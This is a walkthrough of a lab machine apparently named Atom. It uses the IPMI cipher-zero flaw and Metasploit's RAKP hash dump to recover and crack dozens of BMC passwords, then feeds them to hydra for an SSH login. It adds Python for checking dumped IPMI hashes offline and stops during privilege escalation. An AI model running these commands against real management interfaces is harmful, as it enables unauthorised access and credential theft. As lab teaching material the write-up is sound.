Atom
Todd

Information gathering

IP=192.168.0.203
nmap $IP

22/tcp open ssh

Only one port, 22, shows up, and nmap $IP -p- gives the same result. Surely this isn't going to make me brute-force SSH.

Let's try UDP as well. The default nmap -sU $IP is too slow, so add -T5.

nmap -sU $IP -T5

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-13 01:06 EDT
Warning: 192.168.0.203 giving up on port because retransmission cap hit (2).
Nmap scan report for 192.168.0.203
Host is up (0.0012s latency).
Not shown: 980 open|filtered udp ports (no-response)
PORT STATE SERVICE
623/udp open asf-rmcp
687/udp closed asipregistry
789/udp closed unknown
1050/udp closed cma
2343/udp closed nati-logos
5010/udp closed telelpathstart
16939/udp closed unknown
19120/udp closed unknown
19995/udp closed unknown
20522/udp closed unknown
21742/udp closed unknown
23531/udp closed unknown
32773/udp closed sometimes-rpc10
33281/udp closed unknown
33744/udp closed unknown
47981/udp closed unknown
49360/udp closed unknown
52503/udp closed unknown
55043/udp closed unknown
57409/udp closed unknown
MAC Address: 08:00:27:56:C9:74 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 27.39 seconds

A pile of unfamiliar ports; the few that have a service name are worth looking up first. Searching for 623 led straight to the HackTricks article.

First, a summary of the page generated with Kimi:

Summary
The article gives a detailed introduction to the Intelligent Platform Management Interface (IPMI): its basic concepts, uses, components and potential security vulnerabilities. IPMI lets system administrators remotely manage and monitor computer systems even when the operating system is shut down or unresponsive. The article also discusses IPMI weaknesses such as authentication bypass, password hash disclosure and insecure default configurations, as well as how the host system can be reached through the BMC and how a backdoor can be planted. Finally, it provides links to related resources and Shodan search methods.

Key points
IPMI overview: IPMI is a standardized way of remotely managing and monitoring computer systems independently of the operating system or power state, used for pre-boot configuration, shutdown management, recovery from system failures and so on.
IPMI components: including the Baseboard Management Controller (BMC), communication buses and interfaces, IPMI memory, etc.
IPMI vulnerabilities: including IPMI 2.0 authentication bypass, remote password hash disclosure, anonymous authentication, and Supermicro IPMI's cleartext password storage and UPnP vulnerability.
IPMI authentication bypass: demonstrates with Metasploit and ipmitool how the IPMI 2.0 Cipher 0 flaw is used to bypass authentication and change passwords.
IPMI anonymous authentication: many BMCs' default configuration allows anonymous access, which can be used to reset the passwords of named user accounts.
Supermicro IPMI cleartext passwords: Supermicro BMCs store passwords in cleartext, which is a security risk.
Accessing the host: reaching the host system through the BMC's KVM feature or serial redirection.
Planting a backdoor: using ipmitool on a compromised host to create a backdoor user account in the BMC, bypassing authentication.
Shodan search: how to find IPMI-related devices with Shodan.

Exploitation

Following the article, start msf first and then search for port 623.

msfconsole

use auxiliary/scanner/ipmi/ipmi_cipher_zero

show options

msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > set RHOSTS 192.168.0.203
RHOSTS => 192.168.0.203
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > run

[*] Sending IPMI requests to 192.168.0.203->192.168.0.203 (1 hosts)
[+] 192.168.0.203:623 - IPMI - VULNERABLE: Accepted a session open request for cipher zero
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So it seems the vulnerability is present; looks like the direction is right.
Keep reading the article. There is a Remote Password Hash Retrieval method; let's try it:


use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS 192.168.0.203
RHOSTS => 192.168.0.203
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run

[+] 192.168.0.203:623 - IPMI - Hash found: admin:3f8427d3020200001c33a02552bc0c09a48bdcb866fb72dc1958c33f208f91289668e509c8561c14a123456789abcdefa123456789abcdef140561646d696e:18016043968f107618d8a7d2f1d3f4cbf54b94fb
[+] 192.168.0.203:623 - IPMI - Hash for user 'admin' matches password 'cukorborso'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

That means the admin password is cukorborso.
Try logging in over SSH first:

ssh admin@$IP

Wrong password; it's not that simple.
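The admin:<salt>:<hmac> line that ipmi_dumphashes printed above is not a stored password hash but the authentication code from RAKP message 2, which the BMC hands to any client that opens a session: HMAC-SHA1 keyed with the account password over both session IDs, both nonces, the BMC GUID, the role byte and the username. The following Python is added here and is not part of the original post or of Metasploit; it decodes that line and checks a password against it the same way the module does (the field names are my own, the hash line is copied from the page).

```python
import hashlib
import hmac
from dataclasses import dataclass

# The 'Hash found' line for admin exactly as ipmi_dumphashes printed it above
# (copied from the page's output; the module reported that it matched 'cukorborso').
ADMIN_HASH_LINE = (
    "admin:"
    "3f8427d3020200001c33a02552bc0c09a48bdcb866fb72dc1958c33f208f9128"
    "9668e509c8561c14a123456789abcdefa123456789abcdef140561646d696e:"
    "18016043968f107618d8a7d2f1d3f4cbf54b94fb"
)


@dataclass
class Rakp2Salt:
    """What the BMC's RAKP message 2 authentication code is computed over."""
    console_sid: bytes   # 4 bytes, session id chosen by the client
    bmc_sid: bytes       # 4 bytes, session id chosen by the BMC
    console_rand: bytes  # 16-byte client nonce
    bmc_rand: bytes      # 16-byte BMC nonce
    bmc_guid: bytes      # 16-byte BMC GUID
    role: int            # privilege byte from RAKP 1 (0x14: Administrator, name-only lookup)
    username: str


def parse_hash_line(line: str) -> tuple[str, bytes, bytes]:
    """Split a 'user:salt_hex:hmac_hex' line into (user, salt bytes, hmac bytes)."""
    user, salt_hex, mac_hex = line.strip().split(":")
    return user, bytes.fromhex(salt_hex), bytes.fromhex(mac_hex)


def parse_rakp2_salt(salt: bytes) -> Rakp2Salt:
    """Decode the fixed-layout salt; the username length byte must cover the rest."""
    if len(salt) < 58:
        raise ValueError("salt shorter than the RAKP2 fixed fields")
    role, ulen = salt[56], salt[57]
    if 58 + ulen != len(salt):
        raise ValueError("username length byte does not match salt length")
    return Rakp2Salt(salt[0:4], salt[4:8], salt[8:24], salt[24:40],
                     salt[40:56], role, salt[58:].decode("ascii"))


def rakp2_hmac(password: str, salt: bytes) -> bytes:
    """The BMC's RAKP2 authentication code: HMAC-SHA1 keyed with the user's password.
    IPMI 2.0 uses a 20-byte zero-padded key; HMAC zero-pads short keys anyway, so
    the raw password yields the same digest."""
    return hmac.new(password.encode("utf-8"), salt, hashlib.sha1).digest()


def password_matches(password: str, salt: bytes, mac: bytes) -> bool:
    """Offline check, which is all ipmi_dumphashes does to report 'matches password'."""
    return hmac.compare_digest(rakp2_hmac(password, salt), mac)


def check_line(line: str, password: str) -> bool:
    """Convenience wrapper: does this candidate password explain this dumped line?"""
    _, salt, mac = parse_hash_line(line)
    return password_matches(password, salt, mac)


if __name__ == "__main__":
    user, salt, mac = parse_hash_line(ADMIN_HASH_LINE)
    fields = parse_rakp2_salt(salt)
    print(f"user={user} role=0x{fields.role:02x} bmc_guid={fields.bmc_guid.hex()}")
    for candidate in ("password", "cukorborso"):
        print(candidate, password_matches(candidate, salt, mac))
```

Because the check needs nothing from the BMC beyond that one message, the practical defences are long random BMC passwords and keeping 623/udp confined to an isolated management network.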

ipmitool can be used to list the users.

apt-get install ipmitool
ipmitool -I lanplus -C 0 -H $IP -U admin -P cukorborso user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
1 true false false Unknown (0x00)
2 admin true false true ADMINISTRATOR
3 analiese true false true USER
4 briella true false true USER
5 richardson true false true USER
6 carsten true false true USER
7 sibylle true false true USER
8 wai-ching true false true USER
9 jerrilee true false true USER
10 glynn true false true USER
11 asia true false true USER
12 zaylen true false true USER
13 fabien true false true USER
14 merola true false true USER
15 jem true false true USER
16 riyaz true false true USER
17 laten true false true USER
18 cati true false true USER
19 rozalia true false true USER
20 palmer true false true USER
21 onida true false true USER
22 terra true false true USER
23 ranga true false true USER
24 harrie true false true USER
25 pauly true false true USER
26 els true false true USER
27 bqb true false true USER
28 karlotte true false true USER
29 zali true false true USER
30 ende true false true USER
31 stacey true false true USER
32 shirin true false true USER
33 kaki true false true USER
34 saman true false true USER
35 kalie true false true USER
36 deshawn true false true USER
37 mayeul true false true USER
38 true false false Unknown (0x00)
39 true false false Unknown (0x00)
40 true false false Unknown (0x00)
41 true false false Unknown (0x00)
42 true false false Unknown (0x00)
43 true false false Unknown (0x00)
44 true false false Unknown (0x00)
45 true false false Unknown (0x00)
46 true false false Unknown (0x00)
47 true false false Unknown (0x00)
48 true false false Unknown (0x00)
49 true false false Unknown (0x00)
50 true false false Unknown (0x00)
51 true false false Unknown (0x00)
52 true false false Unknown (0x00)
53 true false false Unknown (0x00)
54 true false false Unknown (0x00)
55 true false false Unknown (0x00)
56 true false false Unknown (0x00)
57 true false false Unknown (0x00)
58 true false false Unknown (0x00)
59 true false false Unknown (0x00)
60 true false false Unknown (0x00)
61 true false false Unknown (0x00)
62 true false false Unknown (0x00)
63 true false false Unknown (0x00)

That yields a whole pile of usernames.
Since that password could be retrieved just now, and there is now a username list, it's worth trying again.


ipmitool -I lanplus -C 0 -H $IP -U admin -P cukorborso user list | awk '{print $2}' | uniq -u > /root/Downloads/atom/user.txt

# back in msf

msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set USER_FILE /root/Downloads/atom/user.txt
USER_FILE => /root/Downloads/atom/user.txt
set PASS_FILE /usr/share/wordlists/rockyou.txt
PASS_FILE => /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run

rockyou seems to be too big; the run just hangs. Maybe my VM's hardware is too low-spec? Let's switch to a smaller list.

set PASS_FILE /usr/share/wordlists/seclists/Passwords/Common-Credentials/100k-most-used-passwords-NCSC.txt
run
[+] 192.168.0.203:623 - IPMI - Hash found: admin:ccd7c3b402260000f326453deb9a92068ed2abb938e22bc0c24740f9f27f77ac04d368629254211da123456789abcdefa123456789abcdef140561646d696e:1d02ce7d440aa0ffd5df9731fdbe7d7ecb07cd43
[+] 192.168.0.203:623 - IPMI - Hash found: analiese:57a85d2a8426000014244626ae6d772c0b69e02ce9258d04f3d80a6d3c4beabd989ce4c56242e890a123456789abcdefa123456789abcdef1408616e616c69657365:b4a3978fac2f1f21e55c501166de515c922893f6
[+] 192.168.0.203:623 - IPMI - Hash for user 'analiese' matches password 'honda'
[+] 192.168.0.203:623 - IPMI - Hash found: briella:07a5a2b0062700008fd3680d58b2a12ef6fc7eb379360967b01b8b749fe56253711a0070ade11d8ea123456789abcdefa123456789abcdef1407627269656c6c61:024656045dcae6925f355bed14bcd0b900579332
[+] 192.168.0.203:623 - IPMI - Hash for user 'briella' matches password 'jesus06'
[+] 192.168.0.203:623 - IPMI - Hash found: richardson:8650304b8827000002a530b0bd8a1915e7821a118ccaa19565c68e9cc4147aec123841d694874e51a123456789abcdefa123456789abcdef140a72696368617264736f6e:a09a4383d82b9e09e8143cb5ce97aae075fe6a16
[+] 192.168.0.203:623 - IPMI - Hash found: carsten:913f599c0a2800006998c8a035045703035cf9b667286f22cbbdd0dd6f68facc78126ae5f09dd26da123456789abcdefa123456789abcdef14076361727374656e:64df708b8d673a67f8a88aabdf795eea2d4dda5a
[+] 192.168.0.203:623 - IPMI - Hash for user 'carsten' matches password '2468'
[+] 192.168.0.203:623 - IPMI - Hash found: sibylle:6cbafcb18c2800000160ca739c8a76b87f4602dd19908f2f93a651e01428e9326926c0ed12b95bb9a123456789abcdefa123456789abcdef1407736962796c6c65:211e362e0b5fd44e77d485348947e5e8406e3bc4
[+] 192.168.0.203:623 - IPMI - Hash for user 'sibylle' matches password 'me4life'
[+] 192.168.0.203:623 - IPMI - Hash found: wai-ching:11953d550e290000eb71423a94ed0e453015f01523aee2c2d471cb1fe03aa6ba43163f16935f22c0a123456789abcdefa123456789abcdef14097761692d6368696e67:ffe805df6925c43ef3a31a5b9ea043de1938939e
[+] 192.168.0.203:623 - IPMI - Hash for user 'wai-ching' matches password '10101979'
[+] 192.168.0.203:623 - IPMI - Hash found: jerrilee:2f7c77569029000004fc738a7cddc9f3b9e411142345bc8b624134847d20664a53b265bf68e7cf41a123456789abcdefa123456789abcdef14086a657272696c6565:2f80c5c2990a2b09c25bd8fb7631f7135d719aeb
[+] 192.168.0.203:623 - IPMI - Hash for user 'jerrilee' matches password 'number17'
[+] 192.168.0.203:623 - IPMI - Hash found: glynn:1ada5d8e122a0000861bafb275bdf38c080d7c66011a1df26fb6706764692fb0c9752c00e149a61da123456789abcdefa123456789abcdef1405676c796e6e:17ce5550b99e381d1db8d7a99c331a42b84ff072
[+] 192.168.0.203:623 - IPMI - Hash for user 'glynn' matches password 'evan'
[+] 192.168.0.203:623 - IPMI - Hash found: asia:26d56284942a0000f9078fbbce4283408b8a300abed89fcf6036594ebbf776309c9e350a9f26f268a123456789abcdefa123456789abcdef140461736961:3511bf3fa7f3b8a68a4484ceb1397398bf966575
[+] 192.168.0.203:623 - IPMI - Hash found: zaylen:28fcc6c2162b000031e0b983b5cccfe2470659d8fc562e1c10528cfb6b61d1d4d9184774112ff100a123456789abcdefa123456789abcdef14067a61796c656e:c966bc26ad9ef141fc1a389a7ea03ae0fab37fee
[+] 192.168.0.203:623 - IPMI - Hash for user 'zaylen' matches password '120691'
[+] 192.168.0.203:623 - IPMI - Hash found: fabien:2a20d96e982b000077d4e960098434e7ae7d063c6149a14914276487dc7a212d044350b39a7a8082a123456789abcdefa123456789abcdef140666616269656e:ce73679b198eb4ffa47623fd239f70cf57a4a47c
[+] 192.168.0.203:623 - IPMI - Hash found: merola:5ae358cd022c00006bb6fe7ed45553d4b774c77a974cdad9704567978be534cb613090e3b9bed660a123456789abcdefa123456789abcdef14066d65726f6c61:1954191d567c7e2449b64008dc31d3fa2f68852f
[+] 192.168.0.203:623 - IPMI - Hash for user 'merola' matches password 'mackenzie2'
[+] 192.168.0.203:623 - IPMI - Hash found: jem:0ab87353842c0000ebe049b97a16b2e1cae7e2625e7508f5c9c65ff19aeee54954763d54ef0c9d4ba123456789abcdefa123456789abcdef14036a656d:1ff137bb7ad434f14f8f226aba4be31ab202926a
[+] 192.168.0.203:623 - IPMI - Hash found: riyaz:8ad48fb4062d000014664e722a2bae088952000965c8f179dca28754ef1499cd93c2aa4cc932778da123456789abcdefa123456789abcdef1405726979617a:890f85a2b367aacad3c84ef858454e1cfc703d04
[+] 192.168.0.203:623 - IPMI - Hash found: laten:d48e48ca882d0000d5840f7e641ae1c8a57d96279f9e7cd8dc59259282cf6501adbd10532e275d93a123456789abcdefa123456789abcdef14056c6174656e:beaefde1f2097d67e5f460000ffbde535ec63fbf
[+] 192.168.0.203:623 - IPMI - Hash for user 'laten' matches password 'trick1'
[+] 192.168.0.203:623 - IPMI - Hash found: cati:198031060a2e00000864be87b6149fb3d658a736c12dc98f8f0725a055ca357bea5a017ecf0d7ecca123456789abcdefa123456789abcdef140463617469:e237734470ca4ddb2b4c540a4bead30d14627d02
[+] 192.168.0.203:623 - IPMI - Hash for user 'cati' matches password '122987'
[+] 192.168.0.203:623 - IPMI - Hash found: rozalia:788f77af8c2e00000323e0c846c4c2ad6f996c30a8e481a255b3b02108bb8ca0db0b834281c2b630a123456789abcdefa123456789abcdef1407726f7a616c6961:92ac882f9716e6bacf8e36f5cb91fbc7bb19edb3
[+] 192.168.0.203:623 - IPMI - Hash for user 'rozalia' matches password 'batman!'
[+] 192.168.0.203:623 - IPMI - Hash found: palmer:2d3d8bc50e2f00004911dca02993f6842996899985e5b8ad7881602ec91982b13be3d5fce6cda3b0a123456789abcdefa123456789abcdef140670616c6d6572:e2a38bc638696c21b65afb9da93aa1774db02669
[+] 192.168.0.203:623 - IPMI - Hash for user 'palmer' matches password 'phones'
[+] 192.168.0.203:623 - IPMI - Hash found: onida:2dd4da57902f00008f98b3a16717c6941d5d12d9dcbe051d45498c84ba03e90309084587dbf0b26ba123456789abcdefa123456789abcdef14056f6e696461:1f39f330b72cf4d1591348d4c7550b6a34392692
[+] 192.168.0.203:623 - IPMI - Hash for user 'onida' matches password 'jiggaman'
[+] 192.168.0.203:623 - IPMI - Hash found: terra:d6f78440123000009f3ad3bd90041597b78b7536984aa80223be9896d75891203e5d55ac9a852602a123456789abcdefa123456789abcdef14057465727261:5381d20a537b680dd8e0a39a985dde81a2e62777
[+] 192.168.0.203:623 - IPMI - Hash found: ranga:1d814b219430000074add6f03e29aa33d594d76c8bf0ceb28ccbb8a1f7ceb270931759730c4f62ffa123456789abcdefa123456789abcdef140572616e6761:ec9a71bf2177f4546af2f8ac049c59a6c5010fc1
[+] 192.168.0.203:623 - IPMI - Hash for user 'ranga' matches password 'jaffa1'
[+] 192.168.0.203:623 - IPMI - Hash found: harrie:2c63c07316310000609a37fa5d5f27bbb7118f0a70d46483f4eb1093020ec0bebb508303000344f5a123456789abcdefa123456789abcdef1406686172726965:8b622aab7968f1ae788bb7b8958af40fee012fc2
[+] 192.168.0.203:623 - IPMI - Hash found: pauly:c364c7d582310000d67585c37bf528bc60944e140ef651edef9762c7f1c0f839addfa1a28899bfbea123456789abcdefa123456789abcdef14057061756c79:84159c2c964e37b46c10ea85ec1204971259aa6b
[+] 192.168.0.203:623 - IPMI - Hash for user 'pauly' matches password '515253'
[+] 192.168.0.203:623 - IPMI - Hash found: els:dbd238fe04320000726198f30d91bf8155802f4c047d1af1a248a4484222dd9058f49cabff986f13a123456789abcdefa123456789abcdef1403656c73:76818e5972dd145203c6d47747a7d16cfe026310
[+] 192.168.0.203:623 - IPMI - Hash found: bqb:5b1bcdfb86320000f5daca12fdbde5f88c6a9aad480cd406c76a483aef1b32f2dd75e36ffefd253fa123456789abcdefa123456789abcdef1403627162:b56f8ff69feef06e399c3130e196b1fb4e5390d7
[+] 192.168.0.203:623 - IPMI - Hash for user 'bqb' matches password '290992'
[+] 192.168.0.203:623 - IPMI - Hash found: karlotte:6ad6c66218330000be3bd14f58b4218264330713d49b1d7600f6c71b128e3586395d9b189e5b565ba123456789abcdefa123456789abcdef14086b61726c6f747465:43c46355ab0e1361119b3252556951dcee31b330
[+] 192.168.0.203:623 - IPMI - Hash for user 'karlotte' matches password 'emeralds'
[+] 192.168.0.203:623 - IPMI - Hash found: zali:d6a71fb688330000274baee27e36a5f71fd7423f1cdf5f60e56f7e45ec384c0d0146243835d58e1ea123456789abcdefa123456789abcdef14047a616c69:c44d488489ef9925daea66ddc719fc53134173a6
[+] 192.168.0.203:623 - IPMI - Hash found: ende:544c3f200a34000009a91a843ed7dbd6745328726632fff3213980c55972d06130850ca71a46f7b5a123456789abcdefa123456789abcdef1404656e6465:810e7815e298f0073a025bc3e94680f79a1eb82f
[+] 192.168.0.203:623 - IPMI - Hash for user 'ende' matches password 'tripod'
[+] 192.168.0.203:623 - IPMI - Hash found: stacey:1955c8ac8c34000085b5503a78038d22f3e37faa61ca88e2df4b46aa56412befc656478212c36c88a123456789abcdefa123456789abcdef1406737461636579:18c44057617865782673264f4aca5ff57d064d4e
[+] 192.168.0.203:623 - IPMI - Hash for user 'stacey' matches password 'castillo1'
[+] 192.168.0.203:623 - IPMI - Hash found: shirin:e38523210e350000efff27f57946f460403251226f040855475bfdc8c560e69beb89f738d16e4de5a123456789abcdefa123456789abcdef140673686972696e:4879bea4c955884f8c20b83f25b05499930f9492
[+] 192.168.0.203:623 - IPMI - Hash found: kaki:418a507c90350000acb4896f81b3aaabdf908d5d93d4e08323904a579c724defdb782b2b6541637da123456789abcdefa123456789abcdef14046b616b69:4bc2aecac0fb53144105cac5a718473fb529f029
[+] 192.168.0.203:623 - IPMI - Hash for user 'kaki' matches password 'numberone'
[+] 192.168.0.203:623 - IPMI - Hash found: saman:d7954f6012360000891b05491a9d8f46ab0b4c0d445b82626af07209f5bf1bd48ba1dcf79c28b238a123456789abcdefa123456789abcdef140573616d616e:bdc3d00c1bd55f072aca4b915add0f1bd7e4d7a9
[+] 192.168.0.203:623 - IPMI - Hash found: kalie:3c2b79d79436000048703396e0c09ef177fd5eee965451d647033a89a72decb1ffa0cd2182d597a2a123456789abcdefa123456789abcdef14056b616c6965:ecd5ad12c010e26a594adfe9cdde81663b48ec9c
[+] 192.168.0.203:623 - IPMI - Hash found: deshawn:b0268b760237000096a5cfffc06cc4886cc85b5425917296c340a6926ce00c4bca87ca3b43882230a123456789abcdefa123456789abcdef14076465736861776e:b91fe67c8bb1f4b840c59fa8c6167927f171ada2
[+] 192.168.0.203:623 - IPMI - Hash for user 'deshawn' matches password 'milo123'
[+] 192.168.0.203:623 - IPMI - Hash found: mayeul:ed16a25b843700001a13bbc0612a719438145c4c783b9ac502ef6c03dfc2d2c89d00622587fd2541a123456789abcdefa123456789abcdef14066d617965756c:241d09ce244f4b80a82148f42fefc626b209957e
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Save this output to tmp.txt, extract the user and password, join them in user:pass form, and brute-force SSH with hydra.

cat tmp.txt | grep -E 'Hash for user|matches password' | awk '{printf "%s:%s\n", $9,$12}' | sed  "s/'//g" > /root/Downloads/atom/user_pass.txt
hydra -C /root/Downloads/atom/user_pass.txt ssh://$IP

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-13 03:21:15
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 22 login tries, ~2 tries per task
[DATA] attacking ssh://192.168.0.203:22/
[22][ssh] host: 192.168.0.203 login: onida password: jiggaman
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-13 03:21:23

Found one password, onida:jiggaman; try logging in:

ssh onida@$IP

onida@atom:~$ id
uid=1000(onida) gid=1000(onida) groups=1000(onida),100(users)

Privilege escalation

sudo -l
-bash: sudo: command not found
# no sudo, so the next step is a round of rummaging around.

onida@atom:~$ ps -aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.4 102008 12128 ? Ss 06:38 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S 06:38 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? I< 06:38 0:00 [rcu_gp]
root 4 0.0 0.0 0 0 ? I< 06:38 0:00 [rcu_par_gp]
root 5 0.0 0.0 0 0 ? I< 06:38 0:00 [slub_flushwq]
root 6 0.0 0.0 0 0 ? I< 06:38 0:00 [netns]
root 10 0.0 0.0 0 0 ? I< 06:38 0:00 [mm_percpu_wq]
root 11 0.0 0.0 0 0 ? I 06:38 0:00 [rcu_tasks_kthread]
root 12 0.0 0.0 0 0 ? I 06:38 0:00 [rcu_tasks_rude_kthread]
root 13 0.0 0.0 0 0 ? I 06:38 0:00 [rcu_tasks_trace_kthread]
root 14 0.0 0.0 0 0 ? S 06:38 0:00 [ksoftirqd/0]
root 15 0.0 0.0 0 0 ? I 06:38 0:00 [rcu_preempt]
root 16 0.0 0.0 0 0 ? S 06:38 0:00 [migration/0]
root 18 0.0 0.0 0 0 ? S 06:38 0:00 [cpuhp/0]
root 20 0.0 0.0 0 0 ? S 06:38 0:00 [kdevtmpfs]
root 21 0.0 0.0 0 0 ? I< 06:38 0:00 [inet_frag_wq]
root 22 0.0 0.0 0 0 ? S 06:38 0:00 [kauditd]
root 23 0.0 0.0 0 0 ? S 06:38 0:00 [khungtaskd]
root 24 0.0 0.0 0 0 ? S 06:38 0:00 [oom_reaper]
root 27 0.0 0.0 0 0 ? I< 06:38 0:00 [writeback]
root 28 0.0 0.0 0 0 ? S 06:38 0:01 [kcompactd0]
root 29 0.0 0.0 0 0 ? SN 06:38 0:00 [ksmd]
root 30 0.0 0.0 0 0 ? SN 06:38 0:00 [khugepaged]
root 31 0.0 0.0 0 0 ? I< 06:38 0:00 [kintegrityd]
root 32 0.0 0.0 0 0 ? I< 06:38 0:00 [kblockd]
root 33 0.0 0.0 0 0 ? I< 06:38 0:00 [blkcg_punt_bio]
root 34 0.0 0.0 0 0 ? I< 06:38 0:00 [tpm_dev_wq]
root 35 0.0 0.0 0 0 ? I< 06:38 0:00 [edac-poller]
root 36 0.0 0.0 0 0 ? I< 06:38 0:00 [devfreq_wq]
root 37 0.0 0.0 0 0 ? I< 06:38 0:00 [kworker/0:1H-kblockd]
root 38 0.0 0.0 0 0 ? S 06:38 0:00 [kswapd0]
root 44 0.0 0.0 0 0 ? I< 06:38 0:00 [kthrotld]
root 46 0.0 0.0 0 0 ? I< 06:38 0:00 [acpi_thermal_pm]
root 47 0.0 0.0 0 0 ? I< 06:38 0:00 [mld]
root 48 0.0 0.0 0 0 ? I< 06:38 0:00 [ipv6_addrconf]
root 53 0.0 0.0 0 0 ? I< 06:38 0:00 [kstrp]
root 58 0.0 0.0 0 0 ? I< 06:38 0:00 [zswap-shrink]
root 59 0.0 0.0 0 0 ? I< 06:38 0:00 [kworker/u3:0]
root 128 0.0 0.0 0 0 ? I< 06:38 0:00 [ata_sff]
root 129 0.0 0.0 0 0 ? S 06:38 0:00 [scsi_eh_0]
root 130 0.0 0.0 0 0 ? I< 06:38 0:00 [scsi_tmf_0]
root 131 0.0 0.0 0 0 ? S 06:38 0:00 [scsi_eh_1]
root 132 0.0 0.0 0 0 ? S 06:38 0:00 [scsi_eh_2]
root 133 0.0 0.0 0 0 ? I< 06:38 0:00 [scsi_tmf_2]
root 134 0.0 0.0 0 0 ? I< 06:38 0:00 [scsi_tmf_1]
root 143 0.0 0.0 0 0 ? I< 06:38 0:00 [kworker/0:2H-kblockd]
root 174 0.0 0.0 0 0 ? S 06:38 0:00 [jbd2/sda1-8]
root 175 0.0 0.0 0 0 ? I< 06:38 0:00 [ext4-rsv-conver]
root 215 0.0 0.6 49496 18204 ? Ss 06:38 0:00 /lib/systemd/systemd-journald
root 237 0.0 0.2 26532 6552 ? Ss 06:38 0:00 /lib/systemd/systemd-udevd
systemd+ 252 0.0 0.2 90056 6724 ? Ssl 06:38 0:00 /lib/systemd/systemd-timesyncd
root 302 0.0 0.0 6608 2692 ? Ss 06:38 0:00 /usr/sbin/cron -f
message+ 303 0.0 0.1 9448 5108 ? Ss 06:38 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --s
polkitd 306 0.0 0.2 234744 7768 ? Ssl 06:38 0:00 /usr/lib/polkit-1/polkitd --no-debug
root 307 0.0 0.2 25368 8168 ? Ss 06:38 0:00 /lib/systemd/systemd-logind
root 312 0.0 0.7 258636 21980 ? Ssl 06:38 0:07 /usr/sbin/NetworkManager --no-daemon
root 313 0.0 0.1 16520 5884 ? Ss 06:38 0:00 /sbin/wpa_supplicant -u -s -O DIR=/run/wpa_supplicant GROUP=netdev
root 333 0.0 0.3 317320 11920 ? Ssl 06:38 0:00 /usr/sbin/ModemManager
root 354 0.0 0.0 5872 1024 tty1 Ss+ 06:38 0:00 /sbin/agetty -o -p -- \u --noclear - linux
root 364 0.0 0.0 0 0 ? I< 06:38 0:00 [cryptd]
root 404 0.1 1.6 1204860 49744 ? Ssl 06:38 0:14 /usr/bin/containerd
root 405 0.0 0.3 15412 9328 ? Ss 06:38 0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root 409 0.0 0.0 0 0 ? S 06:38 0:00 [irq/18-vmwgfx]
root 416 0.0 0.7 205740 21836 ? Ss 06:38 0:01 /usr/sbin/apache2 -k start
www-data 489 0.0 0.3 206328 11104 ? S 06:38 0:00 /usr/sbin/apache2 -k start
www-data 491 0.0 0.3 206328 11104 ? S 06:38 0:00 /usr/sbin/apache2 -k start
www-data 497 0.0 0.3 206328 11104 ? S 06:38 0:00 /usr/sbin/apache2 -k start
www-data 498 0.0 0.3 206328 11104 ? S 06:38 0:00 /usr/sbin/apache2 -k start
www-data 499 0.0 0.3 206328 11104 ? S 06:38 0:00 /usr/sbin/apache2 -k start
root 582 0.0 2.7 1385340 82348 ? Ssl 06:38 0:02 /usr/sbin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root 806 0.0 1.6 1053320 49224 ? Ssl 06:38 0:01 /usr/bin/docker start -a f2f2341a4a7b
root 832 0.0 0.4 1156220 15008 ? Sl 06:38 0:00 /usr/sbin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 623 -contai
root 845 0.0 0.4 1156220 12128 ? Sl 06:38 0:00 /usr/sbin/docker-proxy -proto udp -host-ip 0.0.0.0 -host-port 623 -contai
root 858 0.1 0.7 1332256 23568 ? Sl 06:38 0:12 /usr/bin/containerd-shim-runc-v2 -namespace moby -id f2f2341a4a7b3ee958a2
root 879 0.0 0.0 11756 2556 pts/0 Ss+ 06:38 0:00 /bin/bash /usr/bin/start.sh
root 909 0.0 0.1 28056 3188 pts/0 S+ 06:38 0:01 ipmi_sim -c /lan.conf -f /sim.emu
root 1201 0.0 0.0 0 0 ? I 07:58 0:00 [kworker/u2:1-events_unbound]
root 1256 0.2 0.0 0 0 ? I 08:09 0:09 [kworker/0:3-events]
root 1419 0.0 0.0 0 0 ? I 09:21 0:00 [kworker/u2:2-events_unbound]
root 1445 0.0 0.0 0 0 ? I 09:21 0:00 [kworker/0:2-ata_sff]
root 1446 0.0 0.3 17808 10876 ? Ss 09:21 0:00 sshd: onida [priv]
onida 1449 0.0 0.3 18880 10540 ? Ss 09:21 0:00 /lib/systemd/systemd --user
onida 1450 0.0 0.1 103228 3112 ? S 09:21 0:00 (sd-pam)
onida 1460 0.0 0.2 17968 6852 ? S 09:21 0:00 sshd: onida@pts/0
onida 1461 0.0 0.1 9604 5856 pts/0 Ss+ 09:21 0:00 -bash
root 1482 0.0 0.0 0 0 ? I 09:26 0:00 [kworker/0:0-ata_sff]
root 1485 0.0 0.0 0 0 ? I 09:27 0:00 [kworker/u2:0-flush-8:0]
root 1486 0.9 0.3 17800 11052 ? Ss 09:27 0:00 sshd: onida [priv]
onida 1492 0.1 0.2 18060 6856 ? S 09:27 0:00 sshd: onida@pts/1
